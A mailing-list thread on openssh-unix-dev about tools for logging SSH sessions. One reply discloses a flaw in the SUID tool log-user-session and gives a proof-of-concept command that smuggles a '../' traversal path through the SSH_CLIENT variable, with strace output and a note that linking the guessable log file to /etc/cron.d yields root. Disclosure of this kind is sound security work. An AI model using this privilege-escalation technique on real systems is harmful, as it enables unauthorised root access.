Konrad Bucheli writes: > Hi,
> Did you check out log-user-session ? It can be used to record
> the output of ssh shell sessions in a tamper-prof way. And
> it is open source.
>  https://github.com/open-ch/log-user-session
Well, using a SUID-binary in that way partially eliminates the
benefits of tamper-proof logging by increasing the attack surface,
e.g. by allowing each user to create arbitrary files using directory
traversal and symlink attacks, e.g. by calling
SSH_CLIENT="169.254.0.1/../../../../tmp/ 1234 22" /usr/local/bin/log-user-session 'echo "* * * * * root /usr/bin/touch /dead.txt"'
to start the directory traversal and lead to the problematic open
5885 openat(AT_FDCWD, "/var/log/user-session/localhost-build-20181122-140817-169.254.0.1/../../../../tmp/-5883.log", O_WRONLY|O_CREAT|O_APPEND, 0400) = 3
Without symlink protection, linking the "-[guessable pid].log" file
to "/etc/cron.d/dead" will give you root easily. Even with protection,
something should be possible ...
I am currently also writing a tool for a similar reason. To be
really tamper-proof, my solution is preloaded into SSH to intercept
the encryption master key for each session, sends it to a daemon,
that will use a public key to encrypt it and offload it to another
machine. Together with the full-packet-captures of all SSH connections
done by the network infrastructure, I would hope for a tamper-proof
but still secure solution BUT (ha, ha, ha) - it is not ready yet.
hd > Am 03.11.18 um 18:08 schrieb Kaushal Shriyan:
>> Are there any open source tools to keep track of ssh sessions?
>> For example, if a specific user is ssh logging to remote server
>> and what commands or scripts are being run. Basically, i need
>> to log all users sessions.
>> Thanks in Advance and i look forward to hearing from you.
>> Best Regards,
>> Kaushal _______________________________________________
>> openssh-unix-dev mailing list firstname.lastname@example.org
> -- konrad bucheli principal systems engineer
> open systems ag raeffelstrasse 29 ch-8045 zurich
> t: +41 58 100 10 10 f: +41 58 100 10 11 email@example.com
openssh-unix-dev mailing list